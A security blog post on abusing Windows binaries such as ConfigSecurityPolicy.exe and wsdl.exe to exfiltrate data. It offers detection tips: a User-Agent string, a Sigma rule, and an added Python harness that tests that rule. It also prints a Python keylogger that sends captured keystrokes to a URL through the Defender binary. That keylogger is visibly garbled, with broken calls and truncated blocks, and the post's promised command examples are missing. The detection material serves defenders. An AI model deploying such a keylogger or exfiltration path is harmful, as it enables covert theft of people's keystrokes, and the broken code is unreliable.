Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts [1].

You can find a lot of tricks in the Living Off The Land Binaries And Scripts project (LOLBins and LOLScripts).

My first discovery was a simple way to abuse the Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe”] to exfil data:


Looking a little further, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility). The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which generates a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:


Blue team/Red team tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple Sigma rule to help detect a possible insider threat (the logsource and detection keys are restored here because the condition references them; the command-line field is assumed to be CommandLine):
    logsource:
      product: windows
      category: process_creation
    detection:
      selection:
        Image: '*\ConfigSecurityPolicy.exe'
      mandatory_cmdline:
        CommandLine:
          - '*ConfigSecurityPolicy.exe*'
          - '*.xml'
      condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins
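To check what the two tips above would actually flag before putting them into a SIEM, here is an added example (my own code, not from the post or the referenced project) that evaluates the rule's condition, selection and not mandatory_cmdline, over constructed Sysmon-style process-creation events, and scans constructed proxy log lines for the MS Web Services Client Protocol User-Agent. The constant and function names, the proxy log format and all sample events are my own assumptions; the patterns and the User-Agent string are the ones the post gives, and the command-line field is assumed to be CommandLine.

```python
"""Added example (not code from the original post): evaluates the post's Sigma
condition and its User-Agent tip against constructed process-creation events
and proxy log lines, so the logic can be checked offline before deployment."""
import fnmatch
import re
from typing import Dict, List, Tuple

# Values taken from the post's rule and tip; the constant names are our own.
IMAGE_PATTERN = r"*\ConfigSecurityPolicy.exe"
MANDATORY_CMDLINE_PATTERNS = ["*ConfigSecurityPolicy.exe*", "*.xml"]
# Substring of the User-Agent quoted in the post; the .NET build number is left
# out so a different build still matches.
WSDL_USER_AGENT = "MS Web Services Client Protocol"


def sigma_match(value: str, pattern: str) -> bool:
    """Sigma-style wildcard match: '*' matches any run of characters, the
    comparison is case-insensitive and backslashes are literal."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def configsecuritypolicy_rule(event: Dict[str, str]) -> bool:
    """Rule condition from the post: selection and not mandatory_cmdline."""
    selection = sigma_match(event.get("Image", ""), IMAGE_PATTERN)
    excluded = any(sigma_match(event.get("CommandLine", ""), p)
                   for p in MANDATORY_CMDLINE_PATTERNS)
    return selection and not excluded


# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_PROCESS_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe",
     "CommandLine": r"C:\temp\test.xml https://collector.example.invalid/?Key.enter"},
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe",
     "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe" C:\ProgramData\policy.xml'},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe",
     "CommandLine": ""},
]


def events_that_fire(events: List[Dict[str, str]]) -> List[int]:
    """Indices of the events for which the rule condition is true."""
    return [i for i, e in enumerate(events) if configsecuritypolicy_rule(e)]


# Constructed proxy log format (our own): timestamp src method url "user-agent".
PROXY_LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')

SAMPLE_PROXY_LINES = [
    '2020-10-01T10:00:01Z 10.0.0.5 GET http://collector.example.invalid/?Key.shift%27h%27%27i%27 '
    '"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)"',
    '2020-10-01T10:00:02Z 10.0.0.7 GET https://www.example.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    'not a well-formed log line',
    '2020-10-01T10:00:03Z 10.0.0.5 GET http://collector.example.invalid/?Key.enter '
    '"mozilla/4.0 (compatible; msie 6.0; ms web services client protocol 2.0.50727.9151)"',
]


def suspicious_proxy_requests(lines: List[str]) -> List[Tuple[str, str]]:
    """(source, url) for every parseable line whose User-Agent is the .NET web
    services client; malformed lines are skipped rather than raising."""
    hits = []
    for line in lines:
        m = PROXY_LOG_RE.match(line)
        if m and WSDL_USER_AGENT.lower() in m.group("ua").lower():
            hits.append((m.group("src"), m.group("url")))
    return hits


if __name__ == "__main__":
    print("process events firing the rule:", events_that_fire(SAMPLE_PROCESS_EVENTS))
    for src, url in suspicious_proxy_requests(SAMPLE_PROXY_LINES):
        print(f"web services client UA from {src}: {url}")
```

Running it shows the point of the exclusion: the second sample event, whose command line echoes the binary path and ends in .xml, is suppressed by mandatory_cmdline even though the image matches, while an invocation whose command line carries only a URL fires. Compare this against how your own telemetry records CommandLine (many sources include the executable path in it) before relying on the exclusion as written.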

A piece of code to help red team usage (thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From:
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess

URL = ''
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""

def on_press(key):
    global content
    global URL
    global uploader
    if str(key) == 'Key.backspace':
        content += ' '
    content += str(key)
    print(f'last key: {str(key)}')
    if str(key) == 'Key.enter':
        upload_url = (f'{URL}?{content}')[uploader, 'c:\\temp\\test.xml', upload_url])
        buffer = ''
    if key == 0x03:

if __name__ == "__main__":
    with Listener(on_press=on_press) as listener:
    except (KeyboardInterrupt, SystemExit):
Proof of Concept

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, this is a simple and effective way to simulate possible tactics of your opponents; soon I will come back with more tips.


reverse engineering and malware tales | LinkedIn: @isdebuggerpresent